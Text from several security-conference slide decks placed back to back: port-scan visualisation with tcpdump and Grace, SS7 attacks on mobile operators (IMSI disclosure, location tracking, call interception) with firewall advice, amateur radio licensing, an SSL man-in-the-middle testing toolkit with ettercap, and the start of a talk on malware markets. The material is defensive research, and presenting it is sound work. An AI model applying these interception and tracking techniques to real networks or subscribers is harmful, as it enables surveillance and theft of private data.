3.0 scanline 1.01 SuperScan 4.0 Three Parallel Scans WinNMap SuperScan 4.0 Example 4: Vulnerability Scanner Nessus 2.0.10 Sara 5.0.3 Light Medium Heavy Example 5: Wargame Demo Findings (Strengths) • Tools can be fingerprinted • Threading / multiple processes visible • OS/Application features visible • Sequence of ports scanned visible • Useful against slow scans • Useful against distributed scans Findings (Weaknesses) • Spoofing • Interaction with personal firewalls • Countermeasures • Scale / Labeling are issues • Occlusion is a problem • Greater interactivity required for forensics and less aggressive attacks • Some tools are very flexible • Source code not available for some tools Future • Active scanning, visualization of Nmap results • Real-time vs. Offline • Interesting datasets • Honeypot Fingerprinting • Other visualization techniques • Visualization of protocol attacks • Visualization of application layer attacks • Visualization of physical layer attacks (?) • Code up some stand-alone tools Where to go for more information… • www.rumint.com - for latest version of tool • Course websites – http://www.cc.gatech.edu/classes/AY2004/cs7450_spri ng/detailref.html – http://people.cs.vt.edu/~north/infoviz/ – http://graphics.stanford.edu/courses/cs448b-04-winter/ – http://www.otal.umd.edu/Olive/ More Information Information Visualization • Envisioning Information by Tufte • The Visual Display of Quantitative Information by Tufte • Visual Explanations by Tufte • Information Visualization by Spence • Information Visualization: Using Vision to Think by Card • See also the Tufte road show, details at www.edwardtufte.com images: www.amazon.com What’s on the CD • rumint visualization tool • tcpdump | perl | xmgrace – howto – sample scripts • gallery of classic visualizations (w/links) • webpage with security infovis links • this talk Acknowledgements • 404.se2600 – icer – StricK – Rockit – Hendrick – Clint • Kulsoom Abdullah – http://www.prism.gatech.edu/~gte369k/csc/ • Dr. John Stasko – http://www.cc.gatech.edu/~john.stasko/ • Dr. Wenke Lee – http://www.cc.gatech.edu/~wenke/ Questions? http://carcino.gen.nz/images/index.php/04980e0b/53c55ca5 Backup Slides Data Format • tcpdump outputs somewhat verbose output 09:02:01.858240 0:6:5b:4:20:14 0:5:9a:50:70:9 62: 10.100.1.120.4532 > 10.1.3.0.1080: tcp 0 (DF) • parse.pl cleans up output 09 02 01 858240 0:6:5b:4:20:14 0:5:9a:50:70:9 10.100.1.120.4532 10.100.1.120 4532 10.1.3.0.1080 10.1.3.0 1080 tcp • analyze.pl extracts/formats for Grace. 0 4532 1 1080 0 4537 1 1080 0 2370 1 1080 Required Files Perl, tcpdump and grace need to be installed. - http://www.tcpdump.org/ - http://www.perl.org/ - http://plasma-gate.weizmann.ac.il/Grace/ to install grace... Download RPMs (or source) ftp://plasma-gate.weizmann.ac.il/pub/grace/contrib/RPMS The files you want grace-5.1.14-1.i386.rpm pdflib-4.0.3-1.i386.rpm Install #rpm -i pdflib-4.0.3-1.i386.rpm #rpm -i grace-5.1.14-1.i386.rpm Hello World Example # tcpdump -lnnq -c10 | perl parse.pl | perl analyze.pl |outfile.dat # xmgrace outfile.dat & Optionally you can run xmgrace with an external format language file… # xmgrace outfile.dat -batch formatfile See ppt file for more detailed howto information Hello World Example (cont) Optionally you can run xmgrace with an external format language file… xmgrace outfile.dat -batch formatfile formatfile is a text file that pre-configures Grace e.g. title "Port Scan Against Single Host" subtitle "Superscan w/ports 1-1024" yaxis label "Port" yaxis label place both yaxis ticklabel place both xaxis ticklabel off xaxis tick major off xaxis tick minor off autoscale To Run Demo See readme.txt Two demo scripts… – runme.bat (uses sample dataset) – runme_sniff.bat (performs live capture, must be root) Note: you must modify the IP address variable in the Analyzer script. (See analyzer2.pl for example) Example 1 - Baseline • Normal network traffic – FTP, HTTP, SSH, ICMP… • Command Line – Capture Raw Data • tcpdump -l -nnqe -c 1000 tcp or udp | perl parse.pl > exp1_outfile.txt – Run through Analysis Script • cat exp1_outfile.txt | perl analyze_1a.pl > output1a.dat – Open in Grace • xmgrace output1a.dat & Example 1 - Baseline Target Machine’s Ports Remote Machine’s Ports Example 2 - PortScan • Light “normal” network traffic (HTTP) • Command Line – Run 2a.bat (chmod +x 2a.bat) echo running experiment 2 echo 1-1024 port scan tcpdump -l -nnqe -c 1200 tcp or udp > raw_outfile_2.txt cat raw_outfile_2.txt | perl parse_2a.pl > exp2_outfile.txt cat exp2_outfile.txt | perl analyze_2a.pl > output_2a.dat xmgrace output_2a.dat & echo experiment 2 completed Example 3- PortScan “Fingerprinting” Tools Examined: •Nmap Win 1.3.1 (on top of Nmap 3.00) XP Attacker (http://www.insecure.org/nmap/) •Nmap 3.00 RH 8.0 Attacker (http://www.insecure.org/nmap/) •Superscan 3.0 RH 8.0 Attacker (http://www.foundstone.com/index.htm?subnav=resources/navigation.ht m&subcontent=/resources/proddesc/superscan.htm) Example 4: Vulnerability Scanner • Attacker: RH 8.0 running Nessus 2.0.10 • Target: RH 9.0 Example 5: Wargame • Attackers: NSA Red Team • Defenders: US Service Academies Defenders lock down network, but must provide certain services Dataset - http://www.itoc.usma.edu/cdx/2003/logs.zip
pdf
Attacks you can’t combat: Vulnerabilities of most robust mobile operators Sergey Puzankov About me Telecom 7+ years in telecom security 18+ years in telecom industry Security Knowledge sharing Research results & community contribution @xigins sergey_puzankov spuzankov@ptsecurity.com SS7 basics SS7 (Signaling System No. 7) is a set of telephony protocols used to set up and tear down telephone calls, send and receive SMS messages, provide subscriber mobility, and more. Ø  Fixed telephony Ø  2G/3G mobile networks Ø  Interconnection with next- generation networks Who are potential targets? © GSMA Intelligence 2018, Mobile connections by technology https://www.gsmaintelligence.com/research/2018/02/infographic-mobile-connections-by-technology/656/ 5 Now what can a Hacker do? Easily From anywhere Any mobile operator No special skills needed Get access to your email and social media Track location of VIPs and public figures Perform massive denial of service attacks Intercept private data, calls and SMS messages Steal money Take control of your digital identity History of signaling security SS7 development Trusted environment. No security mechanisms in the protocol stack. SIGTRAN (SS7 over IP) introduced. Security is still missing. Scope grows Growing number of SS7 connections, increasing amount of SS7 traffic. No security policies or restrictions. Not trusted anymore Huge number of MNOs, MVNOs, and VAS providers. SS7 widely used, Diameter added and spreading. Still not enough security. Mobile operators and SS7 security Security assessment Signaling IDS SMS Home Routing Security configuration SS7 firewall Basic nodes and identifiers HLR — Home Location Register MSC/VLR — Mobile Switching Center and Visited Location Register SMS-C — SMS Centre MSISDN — Mobile Subscriber Integrated Services Digital Number IMSI — International Mobile Subscriber Identity STP — Signaling Transfer Point GT — Global Title, address of a core node element SS7 protocol stack SCCP TCAP MAP Signaling Connection Control Part is responsible for the routing of a signaling message by Global Titles. Transaction Capabilities Application Part is responsible for transactions and dialogues processing. Mobile Application Part is payload that contains an operation code and appropriate parameters such as IMSI, profile information, and location data. SS7 security means SS7 firewall is the most sophisticated signaling security tool that protects the network against a wide range of threats such as IMSI disclosure, location tracking, and traffic interception. SMS Home Routing is intended to prevent SMS fraud and hide IMSI identities. Signaling Transfer Point makes simple screening of signaling messages. Signaling Transfer Point Ø  Signaling Transfer Point is a router that relays SS7 messages between signaling end-points and other signaling transfer points. Ø  Usually the STP is a border point in a signaling network. Ø  It is possible to use the STP for the screening of the ineligible signaling traffic. Ø  Screening rules of the most STPs are simple, for instance, blocking a signaling message by a source address or redirecting a signaling message by an operation code. Ø  The STP looks through a signaling message layer by layer and applies a rule as soon as the first appropriate pattern is triggered. SMS delivery process STP MSC 1. SRI4SM Request •  MSISDN 1. SRI4SM Request •  MSISDN 2. SRI4SM Response •  IMSI •  MSC Address 2. SRI4SM Response •  IMSI •  MSC Address 3. MT-SMS •  IMSI •  SMS Text 3. MT-SMS •  IMSI •  SMS Text SRI4SM — SendRoutingInfoForSM HLR SMS-C SRI4SM abuse by a malefactor STP MSC 1. SRI4SM Request •  MSISDN 1. SRI4SM Request •  MSISDN 2. SRI4SM Response •  IMSI •  MSC Address 2. SRI4SM Response •  IMSI •  MSC Address HLR SMS Home Routing SMS Router STP HLR MSC 1. SRI4SM Request •  MSISDN 1. SRI4SM Request •  MSISDN 3. MT-SMS •  Fake IMSI •  SMS Text 3. MT-SMS •  Fake IMSI •  SMS Text 4. SRI4SM Request •  MSISDN 6. MT-SMS •  Real IMSI •  SMS Text SMS-C 5. SRI4SM Response •  Real IMSI •  MSC Address 2. SRI4SM Response •  Fake IMSI •  SMS-R Address 2. SRI4SM Response •  Fake IMSI •  SMS-R Address SMS Home Routing against malefactors SMS Router STP HLR MSC 1. SRI4SM Request •  MSISDN 1. SRI4SM Request •  MSISDN 2. SRI4SM Response •  Fake IMSI •  SMS-R Address 2. SRI4SM Response •  Fake IMSI •  SMS-R Address SS7 firewall: typical deployment scheme HLR STP 1. SS7 message 3. SS7 message 2. SS7 message SS7 firewall: blocking rules Firewall rules Category 1 Block a message by an operation code SS7 Message HLR MSC Category 2 Block a message by an operation code and correlation of a source address and subscriber identity Category 3 Block a message by an operation code and subscriber’s real location SCCP Source / Destination TCAP Application Context MAP OpCode, IMSI, … SS7 firewall SS7 attacks and vulnerabilities IMSI disclosure via a malformed Application Context Name (ACN) parameter Location tracking via Operation Code Tag substitution Voice call interception (MiTM) via a Double MAP vulnerability IMSI disclosure Exploitation of malformed ACN TCAP protocol TCAP Message Type — mandatory Transaction IDs — mandatory Dialogue Portion — optional Component Portion — optional Changing ACN 0 – CCITT 4 – Identified Organization 0 – ETSI 0 – Mobile Domain 1 – GSM/UMTS Network 0 – Application Context ID 20 – ShortMsgGateway 3 – Version 3 0 – CCITT 4 – Identified Organization 4 – Unknown 0 – Mobile Domain 1 – GSM/UMTS Network 0 – Application Context ID 20 – ShortMsgGateway 3 – Version 3 TCAP Malformed ACN IMSI disclosure via malformed ACN HLR 1. SRI4SM Request: MSISDN Malformed ACN 1. SRI4SM Request: MSISDN Malformed ACN STP SMS Router Malformed ACN SCCP Destination HLR MAP OpCode, param HLR 1. SRI4SM Request: MSISDN Malformed ACN 1. SRI4SM Request: MSISDN Malformed ACN STP SMS Router SMS Router bypassed 2. SRI4SM Response: IMSI, MSC 2. SRI4SM Response: IMSI, MSC IMSI disclosure via malformed ACN HLR 1. SRI4SM Request: MSISDN Malformed ACN 1. SRI4SM Request: MSISDN Malformed ACN STP SMS Router 2. SRI4SM Response: IMSI, MSC 2. SRI4SM Response: IMSI, MSC Equal IMSIs mean the SMS Home Routing solution is absent or not involved. IMSI disclosure via malformed ACN Location tracking Substitution of Operation Code Tag Mobile Network Operator Numbering plans Country Code (China) Network Destination Code Mobile Country Code (China) Mobile Network Code E.164 MSISDN and GT 86 854 1231237 E.212 IMSI 460 80 4564567894 Blocking rule: category 2 Source address Subscriber identity Operation code Switzerland ≠ China Category 2 Block a message by an operation code and correlation of a source address and subscriber identity ITU-T Q.773 Recommendation = 2 = 6 ITU-T Q.773 – Transaction capabilities formats and encoding Location tracking via Global OpCode 1. PSI with Global OpCode tag 2. PSI with Global OpCode tag The SS7 FW is looking for a Local OpCode. Global OpCodes are ignored. 3. PSI with Global OpCode tag STP MSC/VLR STP 4. PSI Response: Cell ID 4. PSI Response: Cell ID MSC/VLR 1. PSI with Global OpCode tag 2. PSI with Global OpCode tag 3. PSI with Global OpCode tag The VLR replies with the Local OpCode and a requested cell identity. Equipment of four vendors replies to signaling messages with the Global OpCode. Location tracking via Global OpCode Voice call interception (MiTM) Exploitation of a Double MAP vulnerability 1. InsertSubscriberData Request: IMSI Spoofed billing platform address 1. InsertSubscriberData Request: IMSI Spoofed billing platform address STP MSC/VLR Voice call interception (MiTM) 1. InsertSubscriberData Request: IMSI Spoofed billing platform address 1. InsertSubscriberData Request: IMSI Spoofed billing platform address STP 2. InsertSubscriberData Response 2. InsertSubscriberData Response MSC/VLR 3. TCAP End 3. TCAP End Voice call interception (MiTM) 1. InitialDP: IMSI, A-Num, B-Num 1. InitialDP: IMSI, A-Num, B-Num STP MSC/VLR Voice call interception (MiTM) 1. InitialDP: IMSI, A-Num, B-Num 1. InitialDP: IMSI, A-Num, B-Num STP 2. Connect :PBX-Num 2. Connect :PBX-Num MSC/VLR Voice call interception (MiTM) 1. InitialDP: IMSI, A-Num, B-Num 1. InitialDP: IMSI, A-Num, B-Num STP 2. Connect :PBX-Num 2. Connect :PBX-Num MSC/VLR 3. IAM: A-Num, B-Num 3. IAM: A-Num, B-Num Voice call interception (MiTM) SS7 FW against MiTM attack 1.  InsertSubscriberData Request: IMSI, Spoofed billing platform address STP MSC/VLR 2. InsertSubscriberData Request: IMSI, Spoofed billing platform address The SS7 FW correlates the IMSI and source address and blocks the InsertSubscriberData message. Switzerland ≠ China TCAP protocol TCAP Message Type — mandatory Transaction IDs — mandatory Dialogue Portion — optional Component Portion — optional Double MAP component TCAP Message Type — mandatory Transaction IDs — mandatory Dialogue Portion — optional Component Portion — optional Component 1 Component 2 The SS7 FW checks a subscriber’s ID in the first component considering the other data as a long payload not meant to be inspected. Double MAP in MiTM attack STP SS7 FW TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ MSC/VLR Inspect the first component only and forward the message to the network PBX Send the message to the SS7 FW for inspection STP SS7 FW TCAP Continue ReturnError MSC/VLR Double MAP in MiTM attack TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ MSC/VLR Double MAP in MiTM attack TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ Inspect the first component only and forward the message to the network. PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast MSC/VLR Double MAP in MiTM attack TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast TCAP Continue ReturnResultLast MSC/VLR Double MAP in MiTM attack TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast TCAP Continue ReturnResultLast TCAP End MSC/VLR Double MAP in MiTM attack TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast TCAP Continue ReturnResultLast TCAP End MSC/VLR Double MAP in MiTM attack TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast TCAP Continue ReturnResultLast MSC/VLR Double MAP in MiTM attack TCAP End TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnResultLast MSC/VLR TCAP Continue ReturnResultLast TCAP Continue ReturnError Double MAP in MiTM attack TCAP End TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX Main issues in SS7 security SS7 architecture flaws Configuration mistakes Software bugs Conclusion 1.  Check if your security tools are effective against new vulnerabilities. 2.  Use an intrusion detection solution alone with an SS7 firewall in order to detect threats promptly and block a hostile source. 3.  Block TCAP Begin messages with double MAP components. We observed only one legal pair: BeginSubscriberActivity + ProcessUnstructuredSS-Data. 4.  Configure your STP and SS7 firewall carefully. Do not forget about malformed Application Context Name and Global OpCodes. Thank you! spuzankov@ptsecurity.com Sergey Puzankov for ______
pdf
DCFluX in: License to Transmit DCFluX in: License to Transmit Presented By: Matt Krick, DCFluX – K3MK Chief Engineer, New West Broadcasting Systems, Inc. DEFCON 19; Las Vegas, NV “Where have all the weirdos gone?” --Moxie Marlinspike Hidden Agenda 1. Fuck Your Stupid Smart Phone 2. Amateur Radio 3. Getting Started 0. About the Author 5. General Incompetence 4. Commercial To Amateur Hacks • Matt Krick • “DCFluX” • Video Editor • Broadcast Engineer – 1998 to Present • K3MK – Licensed to Transmit, 1994 to Present 0. About the Author Radio Merit Badge 1. Fuck Your Stupid Smart Phone 1. Fuck Your Stupid Smart Phone 1. Fuck Your Stupid Smart Phone • Phone Patch • Auto Patch Phone Calls 1. Fuck Your Stupid Smart Phone • Frequency Modulation • Amplitude Modulation – Single Side Band • Digital Modulation – Project 25 Push To Talk 1. Fuck Your Stupid Smart Phone • Morse Code – CW • Radio Teletype – RTTY – Baudot • Packet – AX.25 • Phase Shift Keying – PSK31 Text Messaging 1. Fuck Your Stupid Smart Phone • SSTV (Slow Scan Television) • Packet Picture Mail 1. Fuck Your Stupid Smart Phone • ATV (Amateur Television) • Amplitude Modulated • Frequency Modulated • D-ATV (Digital Amateur Television) • 8-VSB • COFDM • DSS Video Chat 1. Fuck Your Stupid Smart Phone • APRS (Amateur Packet Reporting System) Location Awareness 1. Fuck Your Stupid Smart Phone • Long Range WiFi – 902 – 928 MHz • 2.4 GHz (802.11b) – 2400 – 2450 MHz • 5.7 GHz (802.11a) – 5680 – 5825 GHz Up to 1500 W PEP (+62 dBm) Internet Access 1. Fuck Your Stupid Smart Phone App Store 1. Fuck Your Stupid Smart Phone No Phone Company Required 1. Fuck Your Stupid Smart Phone Yaesu FT-530 Yaesu FT-530 1. Fuck Your Stupid Smart Phone 1. Fuck Your Stupid Smart Phone Kenwood TH-77A Kenwood TH-77A 1. Fuck Your Stupid Smart Phone 2. Amateur Radio Citizens’ Band ≠ Amateur Radio Citizens’ Band ≠ Amateur Radio FluX Makes Things Simple 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio FRS, GMRS, MURS ≠ Amateur Radio FRS, GMRS, MURS ≠ Amateur Radio FluX Makes Things Simple 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio FCC = “The Man” FCC = “The Man” FluX Makes Things Simple 2. Amateur Radio FluX Makes Things Simple ~ ~ 2. Amateur Radio FluX Makes Things Simple ~ ~ Amateur Radio Spectrum • 160m – 1.8 – 2.0 MHz • 80m – 3.5 – 4.0 MHz • 60m* – 5.3 – 5.4 MHz • 40m – 7.1 – 7.3 MHz • 30m – 10.1 – 10.15 MHz • 20m – 14.0 – 14.35 MHz • 17m – 18.068 – 18.168 MHz • 15m – 21.1 – 21.450 MHz • 12m – 24.89 – 24.99 MHz • 10m – 28.0 – 29.7 MHz 2. Amateur Radio Amateur Radio Spectrum • 6m – 50 – 54 MHz • 2m – 144 – 148 MHz • 1.25m – 219 – 220 MHz – 222 – 225 MHz • 70cm – 420 – 450 MHz • 33cm – 902 – 928 MHz • 23cm – 1.24 – 1.3 GHz • 13cm – 2.3 – 2.31 GHz – 2.39 – 2.45 GHz And More! 2. Amateur Radio Minimum Maximum SSCW (Morse Code) 0.1 Hz 20 Hz CW (Morse Code) 20 Hz 150 Hz RTTY 270 Hz 370 Hz PSK31 - 37.5 Hz Side Band Phone 2.4 kHz 3 kHz AM Phone 5 kHz 10.2 kHz FM Phone 8 kHz 16 kHz AM Television 6 MHz 10 MHz WiFi Data 1 MHz 22 MHz Bandwidth of Popular Modes 2. Amateur Radio Build Your Own Mode 2. Amateur Radio • Digital Voice • Digital Data • Digital Television • Analog HDTV • Analog Telemetry • Vestigial Side Band Voice • Super Slow Analog Data Surprise Me! Surprise Me! Some Restrictions Apply 2. Amateur Radio • No Broadcasting – No music, unless part of a NASA rebroadcast • No Swearing – Don’t use the Seven Dirty Words And More! • ID Transmissions – Every 10 minutes • No obscuring the meaning of communication • No Encryption – Unless commanding a satellite 2. Amateur Radio Don’t be an ass-hat on Amateur Radio. Don’t be an ass-hat on Amateur Radio. FluX Makes Things Simple The Good Stuff 2. Amateur Radio • Experimental ‘Test’ Modes allowed on all bands – Pulse and Spread Spectrum Limited • Unlimited Bandwidth on 33cm and above • 1500 W PEP on most bands – 50 W PEP on 60m – 200 W PEP on 30m – 50 W PEP on 70cm in some locations • Unlimited ERP 47 CFR 2.106 Footnote US7 2. Amateur Radio 2. Amateur Radio FluX Makes Things Simple • PEP = Peak Envelope Power – Peak Power at leaving the transmitter • ERP = Effective Radiated Power – Power in to the radio horizon after feed line loss and antenna gain 2. Amateur Radio FluX Makes Things Simple Higher Antenna Gain = Narrower Beamwidth Higher Antenna Gain = Narrower Beamwidth 2. Technician (No Code) 1. Novice 3. General 5. Extra 4. Advanced 3. Getting Started Classes of Operator 1. Technician 2. General 3. Extra 3. Getting Started Classes of Operator FluX Makes Things Simple No Morse Code requirement No Morse Code requirement 3. Getting Started 1. Technician 3. Getting Started • All Privileges on 6m and Up – 200 W PEP below 6m – CW only on 80m, 40m, 15m – CW, RTTY and Data on 10m – SSB Voice on 10m 28.3 – 28.5 MHz 3. Getting Started All Technician privileges plus: • Most HF privileges – 400 kHz of bandwidth reserved for Advanced and Extra • Ability to administer VE Technician tests 2. General 3. Getting Started All Technician and General privileges plus: • All frequency privileges • Ability to administer all VE tests • Entitled to Class A and Class B call signs 3. Extra 3. Getting Started Call Sign Regions 3. Getting Started 3. Getting Started 3. Getting Started Amateur Electronic Supply 4640 Polaris Ave. (800) 634-6227 Amateur Electronic Supply 4640 Polaris Ave. (800) 634-6227 3. Getting Started $25 - 30 Each $25 - 30 Each 3. Getting Started • www.arrl.org/question-pools • www.arrl.org/exam-practice • www.qrz.com/exams • www.eham.net/exams Free Online Resources Questions Pool Questions on exam Passing grade Technician 396 35 26 General 456 35 26 Extra 738 50 37 3. Getting Started Questions Pool Size Cost of Exam: $15 Cost of Exam: $15 3. Getting Started FluX Makes Things Simple DEFCON 16 VE Team 3. Getting Started 3. Getting Started Ass Kicked By A Blind Man Ass Kicked By A Girl 3. Getting Started 4. Commercial To Amateur Hacks Golden Age of Amateur Radio • 1st Narrow Banding (1963) • 15 kHz FM Deviation to 5 kHz • 50 kHz Channel Spacing to 15 and 25 kHz • 2nd Narrow Banding (2013) • 5 kHz Deviation to 2.5 kHz • UHF – 25 kHz Channel Spacing to 12.5 kHz • VHF – 15 kHz Channel Spacing to 7.5 kHz 4. Commercial To Amateur Hacks 4. Commercial To Amateur Hacks 4. Commercial To Amateur Hacks 150-174 MHz to 144-148 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 144-148 MHz 4. Commercial To Amateur Hacks 403-420 MHz to 440-450 MHz 4. Commercial To Amateur Hacks 450-470 MHz to 440-450 MHz 4. Commercial To Amateur Hacks • GE MASTR-II Receiver Tin Whiskers 450-470 MHz to 440-450 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. Commercial To Amateur Hacks 40-50 MHz to 50-54 MHz 4. Commercial To Amateur Hacks 40-50 MHz to 50-54 MHz 4. Commercial To Amateur Hacks 5. General Incompetence 5. General Incompetence 5. General Incompetence 5. General Incompetence 5. General Incompetence 5. General Incompetence Questions? Questions? matt@kgmn.net In the Q&A Room In the Q&A Room DCFluX in: License to Transmit DCFluX in: License to Transmit A Series of Tubes 2. Amateur Radio
pdf
DEF CON 19: Getting SSLizzard Nicholas J. Percoco – Trustwave SpiderLabs Paul Kehrer – Trustwave SSL Copyright Trustwave 2011 Agenda •  Introductions •  Primer / History: SSL and MITM Attacks •  Mobile SSL User Experience •  Research Motivations •  Research Implications •  Data Transmission Assault Course Components •  Introducing SSLizzard •  Mobile App Test Results •  Conclusions Copyright Trustwave 2011 Introductions Who are we? Nicholas J. Percoco (c7five) •  Head of SpiderLabs at Trustwave •  Started my InfoSec career in the 90s Paul Kehrer (reaperhulk) •  Lead SSL Developer at Trustwave •  Enjoys baking cakes in spare time. Copyright Trustwave 2011 Introductions What’s this talk about? •  De-evolution of User Security Experience (in Mobile Devices) •  History and Types of SSL Attacks •  Lack of Testing Tools for Mobile Applications •  How Various App and Devices Perform Under “SSL Stress” •  A Tool Release to Help Solve this Problem Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks What is SSL? •  Stands for “Secure Sockets Layer” •  Developed by Netscape in 1994 •  Implemented in Netscape Navigator 1.0 •  A protocol to secure a client->server data transmission •  Uses Asymmetric Keys to establish a Symmetric Key •  This happens during a “handshake” before actual data is transmitted Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  Where is SSL (certs) Used? •  To Establish Secure Client to Server Communication •  Client Identity (User Authentication) •  Application Signing •  Log File Integrity Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  How is SSL used in Mobile Devices? •  To Secure Communication Over Public Networks •  To Establish “App” to Server Communication •  “App” Code Signing (Android, IOS, BlackBerryOS) •  Mobile Device Management Profiles (Signed) Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  What is a Man-in-the-Middle Attack? •  Injecting an “Attacker” between a Client and a Server Session. •  “Attacker” intercepts Client request to Server •  “Attacker” established a SECURE Session with Server •  “Attacker” established a UNTRUSTED Session with Client •  “Attacker” can then view / modified data between Client and Server Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  What tools exist to help w/ MITM Attacks? •  thicknet – MITM framework developed by Steve Ocepek (SpiderLabs) •  ettercap – “is a suite for man in the middle attacks on LAN” •  arpspoof – facilitates “arp poising” •  mitmproxy – “is an SSL-capable, intercepting HTTP proxy” •  sslstrip – relies on arpspoof then“strips” the SSL session to force Client to talk HTTP to attacker Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  Why is true SSL MITM difficult? •  SSL certificates have a “chain of trust” •  Attacking public CAs not impossible, but not practical •  Self-Signed Certs throw Client errors •  Malformed Certs are difficult to generate Copyright Trustwave 2011 Mobile SSL User Experience •  No Standard UI •  Most Cases -> No UI At ALL! •  Cryptic Warming Messages •  Users Don’t Know the Difference •  Pop-up could be BS Copyright Trustwave 2011 Research Motivations •  The Browser Community spent almost two decades tweaking the UI behavior when it comes to SSL •  The Mobile Device market destroyed that in less than five years •  There are no standards that today’s mobile users expect to see when their data is transmitted via SSL Copyright Trustwave 2011 Research Motivations •  Most apps completely ignore the UI aspect of security •  There is zero functionality difference between an app that sends data in the clear vs. encrypted •  App developers need to pay attention to this, but also need tools to help them test SSL behavior easily and consistently Copyright Trustwave 2011 Research Implications •  Attackers are focusing more mobile app weaknesses •  If a popular app mishandles SSL, their users are more susceptible to attacks •  Credential Stealing •  Data Interception •  Response Manipulation •  These attacks will go unnoticed due to: •  Lack of User Awareness of the Risks •  Lack of UI Cues within Apps Copyright Trustwave 2011 Data Transmission Assault Course Components •  How do you build a test lab? •  Wireless Switch •  WRT-54GL running Tomato Firmware •  Attacker System •  Linux (must be connect via Ethernet to Switch) •  ettercapNG-0.7.3 (w/ SpiderLabs patch) •  Victim Clients •  Android (Nexus S – v2.3.4) •  iPod Touch 4th Gen (v4.3.3) Copyright Trustwave 2011 Data Transmission Assault Course Components What types of SSL certs do you need? 1.  Valid for Target Domain (i.e. www.myapp.com) 2.  Various Malformed SSL Certificates: •  Null Prefix (big news in 2010) •  CRLF •  Self-Signed •  Signed by Parent Cert (set CA:FALSE) •  Invalid ASN.1 Structures (Fuzzing) •  Broken Encodings 3.  A Method to Generate the Above Easily… Copyright Trustwave 2011 Introducing SSLizzard - About •  SSLizzard is an open source toolkit to easily generate multiple types of invalid SSL certs for ANY given domain. •  The output is then used in various MITM frameworks to perform the SSL attack •  Successfully tested with ettercap (see patch on DVD) •  A thicknet module is being developed by Steve Ocepek. •  Can be used against any OS, Application or Browser. Copyright Trustwave 2011 Introducing SSLizzard – Uses / Usage •  Command Line •  ruby sslizzard.rb mydomain.com •  Generates a key and a number of certificates with various invalid structures for testing. •  Output is written in the current working directory Copyright Trustwave 2011 Introducing SSLizzard – Setup a Test •  Execute SSLizzard to generate certs •  Set up ettercap (patched) with –x flag to specify cert type you want to test •  Use your app as normal and see if you get error msgs •  If you don’t get errors, check ettercap to see if data was intercepted •  You will need to execute ettercap once per cert type generated by SSLizzard to comprehensively test Copyright Trustwave 2011 Introducing SSLizzard - Demo •  Generating a collection of certs •  Using the certs in ettercap (SpiderLabs patch) •  Video of interception of traffic •  Video of victim devices throwing errors/not throwing errors Copyright Trustwave 2011 Mobile App Test Results TO BE RELEASED AT DEF CON 19 Copyright Trustwave 2011 Conclusions We need a world where: •  Developers use SSL for all data transmission •  Consistent, simple, UI that users can understand •  Apps and Devices that fail closed when there is a secure transmission problem Copyright Trustwave 2011 Trustwave’s SpiderLabs® SpiderLabs is an elite team of ethical hackers at Trustwave advancing the security capabilities of leading businesses and organizations throughout the world. More Information: Web: https://www.trustwave.com/spiderlabs Blog: http://blog.spiderlabs.com Twitter: @SpiderLabs Questions?
pdf
The Market for Malware Dr. Thomas J. Holt Assistant Professor Department of Criminal Justice University of North Carolina at Charlotte tjholt@uncc.edu 704-687-6081 Copyright 2007. All references to this work must appropriately cite the author, Thomas J. Holt. Digital Crime Markets • The problem of malware and computer based theft is increasing and becoming more complex – IC3 reports that spam and phishing complaints have increased over the past two years – CSI/FBI reports that virus contamination cost businesses $15 million and bot damages were estimated at $923,700 in 2006 – Law enforcement agencies have begun to crack down on malware users and data thieves • Operation Firewall, Operation Bot Roast Digital Crime Markets • There are a range of websites, forums, and IRC channels devoted to malicious computer activity – Malware, carding, and stolen data • These sites can provide direct information on current and emerging threats and the individuals responsible for their creation – Provides a snapshot of computer crime Data • Data generated from public web forums and sties actively involved in – Carding – Malware – Hacking and security • Posts were examined along with any available materials provided in each forum – Machine translations – Human translators Forum Structure • The forums are structured to act as advertising spaces for the sellers and writers – Individuals post their products or services – Moderators review and 